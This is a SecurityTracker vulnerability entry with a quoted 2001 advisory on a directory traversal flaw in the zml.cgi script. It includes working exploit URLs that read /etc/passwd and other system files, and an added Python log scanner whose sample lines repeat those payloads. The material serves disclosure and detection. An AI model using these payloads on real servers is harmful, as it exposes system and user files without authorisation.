SecurityTracker.com

Category:  Application (Web Server/CGI)  >  Zml.cgi
Vendors:  Timmerman, Abe
Zml.cgi Markup Language Processor Discloses Files on the Server to Remote Users
Date:  Dec 31 2001
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  Blackshell reported an information disclosure vulnerability in the "zml.cgi" script. A remote user can view files located anywhere on the server.

It is reported that a remote user can supply a URL GET request containing the string "../" to traverse the directory and view any file on the server that is readable by the web server.

Some example exploit URLs are provided:

http://[targethost]/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
http://[targethost]/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
http://[targethost]/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00

Impact:  A remote user can view any file on the server that is readable by the web server.
Solution:  No solution was available at the time of this entry.

The author of the report recommends removing the CGI script from your web server.

Vendor URL:  www.jero.cc/zml/zml.html
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat Linux with Apache web server
Reported By:  blackshell@hushmail.com
Message History:   None.
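
To check whether a server that ran zml.cgi received requests of the kind described above, the access log can be searched for "file" values that decode to a "../" segment or a NUL byte, including percent-encoded and double-encoded forms. This is an added example, not part of the SecurityTracker entry or the blackshell advisory; the log lines are constructed samples in Apache combined format, and the function and variable names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed Apache combined-format log lines (sample data, not from the advisory).
SAMPLE_LOG = """\
192.0.2.10 - - [31/Dec/2001:09:12:01 -0800] "GET /cgi-bin/zml.cgi?file=index.zml HTTP/1.0" 200 1843 "-" "Mozilla/4.0"
192.0.2.44 - - [31/Dec/2001:09:14:37 -0800] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1127 "-" "Mozilla/4.0"
192.0.2.44 - - [31/Dec/2001:09:14:52 -0800] "GET /cgi-bin/zml.cgi?file=%2e%2e%2f%2e%2e%2fetc%2ffstab%2500 HTTP/1.0" 200 612 "-" "Mozilla/4.0"
192.0.2.77 - - [31/Dec/2001:09:20:05 -0800] "GET /docs/../index.html HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

# client, method, request target and status from a common/combined log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e, %2500) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def zml_findings(log_text):
    """Return (client, status, decoded file value, reasons) for suspicious zml.cgi requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        if not decode_fully(parts.path).lower().endswith("/zml.cgi"):
            continue  # only the script named in the advisory is in scope
        for pair in re.split(r"[&;]", parts.query):
            key, _, raw = pair.partition("=")
            if decode_fully(key) != "file":
                continue
            value = decode_fully(raw)
            checks = {"traversal": ".." in re.split(r"[/\\]", value),
                      "nul-byte": "\x00" in value}
            reasons = [name for name, hit in checks.items() if hit]
            if reasons:
                findings.append((client, int(status), value, reasons))
    return findings

if __name__ == "__main__":
    for client, status, value, reasons in zml_findings(SAMPLE_LOG):
        print(client, status, repr(value), ",".join(reasons))
```

A flagged request that returned status 200 is the one to triage first, since the script answered it rather than rejecting it.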


 Source Message Contents

Date:  Mon, 31 Dec 2001 00:04:20 -0800
From:  blackshell@hushmail.com
Subject:  [VulnWatch] blackshell2: zml.cgi remote exploit

 


-----BEGIN PGP SIGNED MESSAGE-----

#####################################################
#--blackshell security advisory no2--#		    #
#--zml.cgi remote exploit--#			    #
#####################################################

########################
vendor details & history
########################

zml.cgi for webservers
by jero.cc

http://www.jero.cc/zml/zml.html

##################
details of exploit
##################

this is a classic CGI bug which uses ../../../../ to read remote files.

example:

http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00

this may be used by the attacker to gather vital details about the remote server.

###
fix
###

remove this script from your webserver

####
note
####

this test was conducted on apache box, and a redhat server.
under no circumstances are we liable for any misuse of this
information

########
hi's to:
########

blackshell dev team, #!blackshell contributors and anyone who
over the years has helped us make us what we are

#######
contact
#######

blackshell@hushmail.com

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl8EARECAB8FAjwwHhcYHGJsYWNrc2hlbGxAaHVzaG1haWwuY29tAAoJED2VGGGCU8ut
bHgAn28OCJjLmUCrk+sePY5ukAfYfopJAJ0Y54Te+w7HIVwXeUdSGt1PmPuTAA==
=yPg1
-----END PGP SIGNATURE-----



 



Copyright 2002, SecurityGlobal.net LLC